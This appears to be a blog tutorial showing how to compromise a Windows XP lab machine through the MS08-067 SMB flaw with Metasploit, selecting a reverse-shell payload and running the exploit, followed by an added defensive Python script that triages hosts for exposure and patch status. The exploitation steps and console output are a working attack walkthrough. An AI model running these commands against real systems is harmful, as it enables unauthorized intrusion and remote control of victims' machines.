Let's get started with our first attack to compromise a system. In Kali Linux, Metasploit comes installed by default, so we can start it regardless of which directory our shell (root@kali:~# pwd) is pointing to.
Before starting Metasploit, start the PostgreSQL database, which Metasploit connects to in order to track what you do.
root@kali:~# service postgresql start
Now we're all set to start the Metasploit service. The following command creates a PostgreSQL user named "msf3" and also starts up the web server.
root@kali:~# service metasploit start
Now we can enter the console with the command msfconsole.
Don't be startled if it takes a while to start; it's getting ready for you. Once it has finished, you'll see an ASCII-art banner, the Metasploit version, and other details.
Skipping the very basics, let's move quickly on to our exploit.
Finding the Metasploit Modules:
We will exploit a vulnerability on our victim Windows XP machine, the one patched in Microsoft Security Bulletin MS08-067.
The MS08-067 vulnerability from 2008 was a flaw in netapi32.dll that allowed attackers to send crafted remote procedure call (RPC) requests over the Server Message Block (SMB) service and take over a target system. This vulnerability is especially critical because it does not require the attacker to authenticate to the target machine.
For more details, you can visit the Metasploit online database of modules.
msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
Here we see the exact exploit name, so we can look up more information about it.
msf > info exploit/windows/smb/ms08_067_netapi

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <firstname.lastname@example.org>
  Brett Moore <email@example.com>
  frank2 <firstname.lastname@example.org>
  jduck <email@example.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
Read through the output; if you would like a simpler explanation, just ask in the comments below.
To use this module in Metasploit:
msf > use windows/smb/ms08_067_netapi
Metasploit obviously needs some information from you about the attacker and the victim; it doesn't know the magic words. Use show options to see what Metasploit needs.
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST <target IP>
RPORT: the remote port. Here we can see RPORT is already set to 445, which is the default port for SMB.
SMBPIPE: this is set by default to BROWSER, the SMB named pipe used for inter-process communication with the Windows host over the network.
To view the target OS versions the module supports:
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   ...............
The target is set to 0 (Automatic Targeting) by default.
Now it feels like we are all set, but at this point we still haven't told our exploit what to do once the target is exploited.
For this, Metasploit has PAYLOADS, which we can choose according to our needs. To find the right one:
msf exploit(ms08_067_netapi) > show payloads
This gives you the complete list of payloads available for this specific exploit.
Here we set the PAYLOAD manually:
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
This is a reverse shell: the exploited target connects back to us and hands over a shell. Here we need to enter the IP address of the attacker machine and the port to listen on; run show options again to see and set them.
And finally, execute our exploit:
msf exploit(ms08_067_netapi) > exploit
Congratulations: You have successfully exploited your first machine!
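The same module from a defender's side, as an added example that is not part of the original post: a small Python triage that cross-checks a constructed asset inventory against the OS families listed under show targets, the SMB port 445 shown as RPORT, and Microsoft's KB958644 security update for MS08-067. The hostnames and inventory data are constructed for illustration.

```python
"""Exposure triage for MS08-067 (KB958644): cross-check a constructed asset
inventory against the OS families listed by the module's `show targets`."""
from __future__ import annotations
from dataclasses import dataclass, field

# OS families that appear in the module's target list (Ids 1-7 above).
MS08_067_TARGET_OS = ("Windows 2000", "Windows XP", "Windows 2003")
# Microsoft's security update for MS08-067 (replaces the flawed netapi32.dll).
MS08_067_KB = "KB958644"
SMB_PORT = 445  # RPORT default shown by `show options`


@dataclass
class Host:
    name: str
    os: str
    open_ports: set[int]
    installed_kbs: set[str] = field(default_factory=set)


def classify(host: Host) -> str:
    """Classify one host as NOT_AFFECTED, PATCHED, FILTERED or EXPOSED.

    EXPOSED means an in-scope OS is reachable over SMB, where the module
    needs no authentication, and the fix is not installed.
    """
    if not any(host.os.startswith(family) for family in MS08_067_TARGET_OS):
        return "NOT_AFFECTED"
    if MS08_067_KB in host.installed_kbs:
        return "PATCHED"
    if SMB_PORT not in host.open_ports:
        return "FILTERED"  # still needs the patch, but TCP/445 is unreachable
    return "EXPOSED"


def triage(hosts: list[Host]) -> dict[str, str]:
    """Map every hostname to its classification."""
    return {h.name: classify(h) for h in hosts}


def exposed_hosts(hosts: list[Host]) -> list[str]:
    """Hostnames to remediate first: patch, or at least block TCP/445."""
    return sorted(h.name for h in hosts if classify(h) == "EXPOSED")


# Constructed sample inventory (hypothetical hostnames, not from the post).
INVENTORY = [
    Host("xp-lab-01", "Windows XP SP3", {139, 445, 3389}),
    Host("dc-2003", "Windows 2003 SP2", {53, 88, 445}, {"KB958644"}),
    Host("w2k-print", "Windows 2000 SP4", {80, 9100}),
    Host("ubuntu-web", "Ubuntu 20.04", {22, 80, 443}),
]
```

Running triage(INVENTORY) flags only xp-lab-01 as EXPOSED; the 2003 host is PATCHED and the Windows 2000 printer host is FILTERED because port 445 is not reachable.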
Stay tuned for the next blog post to learn what more we can do now that we have a session.